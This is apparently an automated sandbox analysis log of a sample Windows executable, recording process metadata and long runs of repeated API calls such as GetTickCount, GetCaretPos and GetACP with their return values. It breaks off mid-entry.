# Flog Txt Version 1 # Analyzer Version: 3.2.1 # Analyzer Build Date: Jan 15 2020 08:26:44 # Log Creation Date: 29.01.2020 14:57:56.214 Process: id = "1" image_name = "%localappdata%24fd5b09-6d4d-435f-beb9-3d272f67be2csample.exe.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\%localappdata%24fd5b09-6d4d-435f-beb9-3d272f67be2csample.exe.exe" page_root = "0x3525b000" os_pid = "0xa98" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x444" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\%LOCALAPPDATA%24fd5b09-6d4d-435f-beb9-3d272f67be2cSAMPLE.EXE.exe\" " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e6e5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 1 os_tid = 0x560 [0036.371] GetTickCount () returned 0x1154673 [0036.371] GetTickCount () returned 0x1154673 [0036.371] GetTickCount () returned 0x1154673 [0036.371] GetTickCount () returned 0x1154673 [0036.371] GetTickCount () returned 0x1154673 [0036.371] GetTickCount () returned 0x1154673 [0036.371] GetTickCount () returned 0x1154673 [0036.371] GetTickCount () returned 0x1154673 [0036.371] GetTickCount () returned 0x1154673 [0036.371] GetTickCount () returned 0x1154673 [0036.371] GetTickCount () returned 0x1154673 [0036.371] GetTickCount () returned 0x1154673 [0036.371] GetTickCount () returned 0x1154673 [0036.371] GetTickCount () returned 0x1154673 [0036.371] GetTickCount () returned 0x1154673 [0036.371] GetTickCount () returned 0x1154673 [0036.371] GetTickCount () returned 0x1154673 [0036.371] GetTickCount () returned 0x1154673 [0036.371] GetTickCount () returned 0x1154673 [0036.371] GetTickCount () returned 0x1154673 [0036.371] GetTickCount () returned 0x1154673 [0036.371] GetTickCount () returned 0x1154673 [0036.371] GetTickCount () returned 0x1154673 [0036.371] GetTickCount () returned 0x1154673 [0036.371] GetTickCount () returned 0x1154673 [0036.371] GetTickCount () returned 0x1154673 [0036.371] GetTickCount () returned 0x1154673 [0036.371] GetTickCount () returned 0x1154673 [0036.371] GetTickCount () returned 0x1154673 [0036.372] GetTickCount () returned 0x1154673 [0036.372] GetTickCount () returned 0x1154673 [0036.372] GetTickCount () returned 0x1154673 [0036.372] GetTickCount () returned 0x1154673 [0036.372] GetTickCount () returned 0x1154673 [0036.372] GetTickCount () returned 0x1154673 [0036.372] GetTickCount () returned 0x1154673 [0036.372] GetTickCount () returned 0x1154673 [0036.372] GetTickCount () returned 0x1154673 [0036.372] GetTickCount () returned 0x1154673 [0036.372] GetTickCount () returned 0x1154673 [0036.372] GetTickCount () returned 0x1154673 [0036.372] GetTickCount () returned 0x1154673 [0036.372] GetTickCount () returned 0x1154673 [0036.372] GetTickCount () returned 0x1154673 [0036.372] GetTickCount () returned 0x1154673 [0036.372] GetTickCount () returned 0x1154673 [0036.372] GetTickCount () returned 0x1154673 [0036.372] GetTickCount () returned 0x1154673 [0036.372] GetTickCount () returned 0x1154673 [0036.372] GetTickCount () returned 0x1154673 [0036.372] GetTickCount () returned 0x1154673 [0036.372] GetTickCount () returned 0x1154673 [0036.372] GetTickCount () returned 0x1154673 [0036.372] GetTickCount () returned 0x1154673 [0036.372] GetTickCount () returned 0x1154673 [0036.372] GetTickCount () returned 0x1154673 [0036.372] GetTickCount () returned 0x1154673 [0036.372] GetTickCount () returned 0x1154673 [0036.372] GetTickCount () returned 0x1154673 [0036.372] GetTickCount () returned 0x1154673 [0036.372] GetTickCount () returned 0x1154673 [0036.373] GetTickCount () returned 0x1154673 [0036.373] GetTickCount () returned 0x1154673 [0036.373] GetTickCount () returned 0x1154673 [0036.373] GetTickCount () returned 0x1154673 [0036.373] GetTickCount () returned 0x1154673 [0036.373] GetTickCount () returned 0x1154673 [0036.373] GetTickCount () returned 0x1154673 [0036.373] GetTickCount () returned 0x1154673 [0036.373] GetTickCount () returned 0x1154673 [0036.373] GetTickCount () returned 0x1154673 [0036.373] GetTickCount () returned 0x1154673 [0036.373] GetTickCount () returned 0x1154673 [0036.373] GetTickCount () returned 0x1154673 [0036.373] GetTickCount () returned 0x1154673 [0036.373] GetTickCount () returned 0x1154673 [0036.373] GetTickCount () returned 0x1154673 [0036.373] GetTickCount () returned 0x1154673 [0036.373] GetTickCount () returned 0x1154673 [0036.373] GetTickCount () returned 0x1154673 [0036.373] GetTickCount () returned 0x1154673 [0036.373] GetTickCount () returned 0x1154673 [0036.373] GetTickCount () returned 0x1154673 [0036.373] GetTickCount () returned 0x1154673 [0036.373] GetTickCount () returned 0x1154673 [0036.373] GetTickCount () returned 0x1154673 [0036.373] GetTickCount () returned 0x1154673 [0036.373] GetTickCount () returned 0x1154673 [0036.373] GetTickCount () returned 0x1154673 [0036.373] GetTickCount () returned 0x1154673 [0036.373] GetTickCount () returned 0x1154673 [0036.373] GetTickCount () returned 0x1154673 [0036.373] GetTickCount () returned 0x1154673 [0036.374] GetTickCount () returned 0x1154673 [0036.374] GetTickCount () returned 0x1154673 [0036.374] GetTickCount () returned 0x1154673 [0036.374] GetTickCount () returned 0x1154673 [0036.374] GetTickCount () returned 0x1154673 [0036.374] GetTickCount () returned 0x1154673 [0036.374] GetTickCount () returned 0x1154673 [0036.374] GetTickCount () returned 0x1154673 [0036.374] GetTickCount () returned 0x1154673 [0036.374] GetTickCount () returned 0x1154673 [0036.374] GetTickCount () returned 0x1154673 [0036.374] GetTickCount () returned 0x1154673 [0036.374] GetTickCount () returned 0x1154673 [0036.374] GetTickCount () returned 0x1154673 [0036.374] GetTickCount () returned 0x1154673 [0036.374] GetTickCount () returned 0x1154673 [0036.374] GetTickCount () returned 0x1154673 [0036.374] GetTickCount () returned 0x1154673 [0036.374] GetTickCount () returned 0x1154673 [0036.374] GetTickCount () returned 0x1154673 [0036.374] GetTickCount () returned 0x1154673 [0036.374] GetTickCount () returned 0x1154673 [0036.374] GetTickCount () returned 0x1154673 [0036.374] GetTickCount () returned 0x1154673 [0036.374] GetTickCount () returned 0x1154673 [0036.374] GetTickCount () returned 0x1154673 [0036.374] GetTickCount () returned 0x1154673 [0036.374] GetTickCount () returned 0x1154673 [0036.374] GetTickCount () returned 0x1154673 [0036.374] GetTickCount () returned 0x1154673 [0036.374] GetTickCount () returned 0x1154673 [0036.375] GetTickCount () returned 0x1154673 [0036.375] GetTickCount () returned 0x1154673 [0036.375] GetTickCount () returned 0x1154673 [0036.375] GetTickCount () returned 0x1154673 [0036.375] GetTickCount () returned 0x1154673 [0036.375] GetTickCount () returned 0x1154673 [0036.375] GetTickCount () returned 0x1154673 [0036.375] GetTickCount () returned 0x1154673 [0036.375] GetTickCount () returned 0x1154673 [0036.375] GetTickCount () returned 0x1154673 [0036.375] GetTickCount () returned 0x1154673 [0036.375] GetTickCount () returned 0x1154673 [0036.375] GetTickCount () returned 0x1154673 [0036.375] GetTickCount () returned 0x1154673 [0036.375] GetTickCount () returned 0x1154673 [0036.375] GetTickCount () returned 0x1154673 [0036.375] GetTickCount () returned 0x1154673 [0036.375] GetTickCount () returned 0x1154673 [0036.375] GetTickCount () returned 0x1154673 [0036.375] GetTickCount () returned 0x1154673 [0036.375] GetTickCount () returned 0x1154673 [0036.375] GetTickCount () returned 0x1154673 [0036.375] GetTickCount () returned 0x1154673 [0036.375] GetTickCount () returned 0x1154673 [0036.375] GetTickCount () returned 0x1154673 [0036.375] GetTickCount () returned 0x1154673 [0036.375] GetTickCount () returned 0x1154673 [0036.375] GetTickCount () returned 0x1154673 [0036.375] GetTickCount () returned 0x1154673 [0036.376] GetTickCount () returned 0x1154673 [0036.376] GetTickCount () returned 0x1154673 [0036.376] GetTickCount () returned 0x1154673 [0036.376] GetTickCount () returned 0x1154673 [0036.376] GetTickCount () returned 0x1154673 [0036.376] GetTickCount () returned 0x1154673 [0036.376] GetTickCount () returned 0x1154673 [0036.376] GetTickCount () returned 0x1154673 [0036.376] GetTickCount () returned 0x1154673 [0036.376] GetTickCount () returned 0x1154673 [0036.376] GetTickCount () returned 0x1154673 [0036.376] GetTickCount () returned 0x1154673 [0036.376] GetTickCount () returned 0x1154673 [0036.376] GetTickCount () returned 0x1154673 [0036.376] GetTickCount () returned 0x1154673 [0036.376] GetTickCount () returned 0x1154673 [0036.376] GetTickCount () returned 0x1154673 [0036.376] GetTickCount () returned 0x1154673 [0036.376] GetTickCount () returned 0x1154673 [0036.376] GetTickCount () returned 0x1154673 [0036.376] GetTickCount () returned 0x1154673 [0036.376] GetTickCount () returned 0x1154673 [0036.376] GetTickCount () returned 0x1154673 [0036.376] GetTickCount () returned 0x1154673 [0036.376] GetTickCount () returned 0x1154673 [0036.376] GetTickCount () returned 0x1154673 [0036.376] GetTickCount () returned 0x1154673 [0036.376] GetTickCount () returned 0x1154673 [0036.377] GetTickCount () returned 0x1154673 [0036.377] GetTickCount () returned 0x1154673 [0036.377] GetTickCount () returned 0x1154673 [0036.377] GetTickCount () returned 0x1154673 [0036.377] GetTickCount () returned 0x1154673 [0036.377] GetTickCount () returned 0x1154673 [0036.377] GetTickCount () returned 0x1154673 [0036.377] GetTickCount () returned 0x1154673 [0036.377] GetTickCount () returned 0x1154673 [0036.377] GetTickCount () returned 0x1154673 [0036.377] GetTickCount () returned 0x1154673 [0036.377] GetTickCount () returned 0x1154673 [0036.377] GetTickCount () returned 0x1154673 [0036.377] GetTickCount () returned 0x1154673 [0036.377] GetTickCount () returned 0x1154673 [0036.377] GetTickCount () returned 0x1154673 [0036.377] GetTickCount () returned 0x1154673 [0036.377] GetTickCount () returned 0x1154673 [0036.377] GetTickCount () returned 0x1154673 [0036.377] GetTickCount () returned 0x1154673 [0036.377] GetTickCount () returned 0x1154673 [0036.377] GetTickCount () returned 0x1154673 [0036.377] GetTickCount () returned 0x1154673 [0036.377] GetTickCount () returned 0x1154673 [0036.377] GetTickCount () returned 0x1154673 [0036.377] GetTickCount () returned 0x1154673 [0036.377] GetTickCount () returned 0x1154673 [0036.377] GetTickCount () returned 0x1154673 [0036.377] GetTickCount () returned 0x1154673 [0036.377] GetTickCount () returned 0x1154673 [0036.377] GetTickCount () returned 0x1154673 [0036.377] GetTickCount () returned 0x1154673 [0036.378] GetTickCount () returned 0x1154673 [0036.378] GetTickCount () returned 0x1154673 [0036.378] GetTickCount () returned 0x1154673 [0036.378] GetTickCount () returned 0x1154673 [0036.378] GetTickCount () returned 0x1154673 [0036.378] GetTickCount () returned 0x1154673 [0036.378] GetTickCount () returned 0x1154673 [0036.378] GetTickCount () returned 0x1154673 [0036.378] GetTickCount () returned 0x1154673 [0036.378] GetTickCount () returned 0x1154673 [0036.378] GetTickCount () returned 0x1154673 [0036.378] GetTickCount () returned 0x1154673 [0036.378] GetTickCount () returned 0x1154673 [0036.378] GetTickCount () returned 0x1154673 [0036.378] GetTickCount () returned 0x1154673 [0036.378] GetTickCount () returned 0x1154673 [0036.378] GetTickCount () returned 0x1154673 [0036.378] GetTickCount () returned 0x1154673 [0036.378] GetTickCount () returned 0x1154673 [0036.378] GetTickCount () returned 0x1154673 [0036.378] GetTickCount () returned 0x1154673 [0036.378] GetTickCount () returned 0x1154673 [0036.378] GetTickCount () returned 0x1154673 [0036.378] GetTickCount () returned 0x1154673 [0036.378] GetTickCount () returned 0x1154673 [0036.378] GetTickCount () returned 0x1154673 [0036.378] GetTickCount () returned 0x1154673 [0036.378] GetTickCount () returned 0x1154673 [0036.378] GetTickCount () returned 0x1154673 [0036.378] GetTickCount () returned 0x1154673 [0036.378] GetTickCount () returned 0x1154673 [0036.378] GetTickCount () returned 0x1154673 [0036.378] GetTickCount () returned 0x1154673 [0036.379] GetTickCount () returned 0x1154673 [0036.379] GetTickCount () returned 0x1154673 [0036.379] GetTickCount () returned 0x1154673 [0039.037] lstrlenW (lpString="") returned 0 [0039.037] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.038] GetACP () returned 0x4e4 [0039.038] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.038] GetACP () returned 0x4e4 [0039.038] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.038] GetACP () returned 0x4e4 [0039.038] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.038] GetACP () returned 0x4e4 [0039.038] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.038] GetACP () returned 0x4e4 [0039.038] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.038] GetACP () returned 0x4e4 [0039.038] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.038] GetACP () returned 0x4e4 [0039.038] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.038] GetACP () returned 0x4e4 [0039.038] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.038] GetACP () returned 0x4e4 [0039.038] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.038] GetACP () returned 0x4e4 [0039.038] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.038] GetACP () returned 0x4e4 [0039.038] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.038] GetACP () returned 0x4e4 [0039.038] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.038] GetACP () returned 0x4e4 [0039.038] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.038] GetACP () returned 0x4e4 [0039.038] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.038] GetACP () returned 0x4e4 [0039.038] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.038] GetACP () returned 0x4e4 [0039.039] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.039] GetACP () returned 0x4e4 [0039.039] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.039] GetACP () returned 0x4e4 [0039.039] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.039] GetACP () returned 0x4e4 [0039.039] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.039] GetACP () returned 0x4e4 [0039.039] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.039] GetACP () returned 0x4e4 [0039.039] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.039] GetACP () returned 0x4e4 [0039.039] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.039] GetACP () returned 0x4e4 [0039.039] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.039] GetACP () returned 0x4e4 [0039.039] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.039] GetACP () returned 0x4e4 [0039.039] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.039] GetACP () returned 0x4e4 [0039.039] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.039] GetACP () returned 0x4e4 [0039.039] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.039] GetACP () returned 0x4e4 [0039.039] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.039] GetACP () returned 0x4e4 [0039.039] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.039] GetACP () returned 0x4e4 [0039.039] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.039] GetACP () returned 0x4e4 [0039.039] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.039] GetACP () returned 0x4e4 [0039.039] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.039] GetACP () returned 0x4e4 [0039.040] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.040] GetACP () returned 0x4e4 [0039.040] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.040] GetACP () returned 0x4e4 [0039.040] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.040] GetACP () returned 0x4e4 [0039.040] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.040] GetACP () returned 0x4e4 [0039.040] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.040] GetACP () returned 0x4e4 [0039.040] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.040] GetACP () returned 0x4e4 [0039.040] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.040] GetACP () returned 0x4e4 [0039.040] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.040] GetACP () returned 0x4e4 [0039.040] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.040] GetACP () returned 0x4e4 [0039.040] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.040] GetACP () returned 0x4e4 [0039.040] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.040] GetACP () returned 0x4e4 [0039.040] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.040] GetACP () returned 0x4e4 [0039.040] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.040] GetACP () returned 0x4e4 [0039.040] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.040] GetACP () returned 0x4e4 [0039.040] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.040] GetACP () returned 0x4e4 [0039.040] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.040] GetACP () returned 0x4e4 [0039.040] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.040] GetACP () returned 0x4e4 [0039.040] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.040] GetACP () returned 0x4e4 [0039.040] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.041] GetACP () returned 0x4e4 [0039.041] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.041] GetACP () returned 0x4e4 [0039.041] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.041] GetACP () returned 0x4e4 [0039.041] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.041] GetACP () returned 0x4e4 [0039.041] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.041] GetACP () returned 0x4e4 [0039.041] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.041] GetACP () returned 0x4e4 [0039.041] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.041] GetACP () returned 0x4e4 [0039.041] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.041] GetACP () returned 0x4e4 [0039.041] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.041] GetACP () returned 0x4e4 [0039.041] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.041] GetACP () returned 0x4e4 [0039.041] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.041] GetACP () returned 0x4e4 [0039.041] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.041] GetACP () returned 0x4e4 [0039.041] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.041] GetACP () returned 0x4e4 [0039.041] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.041] GetACP () returned 0x4e4 [0039.041] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.041] GetACP () returned 0x4e4 [0039.041] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.041] GetACP () returned 0x4e4 [0039.041] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.041] GetACP () returned 0x4e4 [0039.041] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.042] GetACP () returned 0x4e4 [0039.042] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.042] GetACP () returned 0x4e4 [0039.042] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.042] GetACP () returned 0x4e4 [0039.042] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.042] GetACP () returned 0x4e4 [0039.042] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.042] GetACP () returned 0x4e4 [0039.042] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.042] GetACP () returned 0x4e4 [0039.042] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.042] GetACP () returned 0x4e4 [0039.042] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.042] GetACP () returned 0x4e4 [0039.042] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.042] GetACP () returned 0x4e4 [0039.042] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.042] GetACP () returned 0x4e4 [0039.042] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.042] GetACP () returned 0x4e4 [0039.042] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.042] GetACP () returned 0x4e4 [0039.042] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.042] GetACP () returned 0x4e4 [0039.042] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.042] GetACP () returned 0x4e4 [0039.042] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.042] GetACP () returned 0x4e4 [0039.042] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.042] GetACP () returned 0x4e4 [0039.042] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.042] GetACP () returned 0x4e4 [0039.042] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.042] GetACP () returned 0x4e4 [0039.042] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.042] GetACP () returned 0x4e4 [0039.043] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.043] GetACP () returned 0x4e4 [0039.043] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.043] GetACP () returned 0x4e4 [0039.043] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.043] GetACP () returned 0x4e4 [0039.043] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.043] GetACP () returned 0x4e4 [0039.043] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.043] GetACP () returned 0x4e4 [0039.043] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.043] GetACP () returned 0x4e4 [0039.043] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.043] GetACP () returned 0x4e4 [0039.043] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.043] GetACP () returned 0x4e4 [0039.043] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.043] GetACP () returned 0x4e4 [0039.043] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.043] GetACP () returned 0x4e4 [0039.043] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.043] GetACP () returned 0x4e4 [0039.043] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.043] GetACP () returned 0x4e4 [0039.043] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.043] GetACP () returned 0x4e4 [0039.043] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.043] GetACP () returned 0x4e4 [0039.043] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.043] GetACP () returned 0x4e4 [0039.043] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.043] GetACP () returned 0x4e4 [0039.043] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.044] GetACP () returned 0x4e4 [0039.044] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.044] GetACP () returned 0x4e4 [0039.044] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.044] GetACP () returned 0x4e4 [0039.044] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.044] GetACP () returned 0x4e4 [0039.044] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.044] GetACP () returned 0x4e4 [0039.044] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.044] GetACP () returned 0x4e4 [0039.044] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.044] GetACP () returned 0x4e4 [0039.044] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.044] GetACP () returned 0x4e4 [0039.044] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.044] GetACP () returned 0x4e4 [0039.044] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.044] GetACP () returned 0x4e4 [0039.044] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.044] GetACP () returned 0x4e4 [0039.044] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.044] GetACP () returned 0x4e4 [0039.044] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.044] GetACP () returned 0x4e4 [0039.044] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.044] GetACP () returned 0x4e4 [0039.044] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.044] GetACP () returned 0x4e4 [0039.044] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.044] GetACP () returned 0x4e4 [0039.044] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.044] GetACP () returned 0x4e4 [0039.044] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.045] GetACP () returned 0x4e4 [0039.045] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.045] GetACP () returned 0x4e4 [0039.045] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.045] GetACP () returned 0x4e4 [0039.045] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.045] GetACP () returned 0x4e4 [0039.045] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.045] GetACP () returned 0x4e4 [0039.045] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.045] GetACP () returned 0x4e4 [0039.045] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.045] GetACP () returned 0x4e4 [0039.045] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.045] GetACP () returned 0x4e4 [0039.045] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0039.045] GetACP () returned 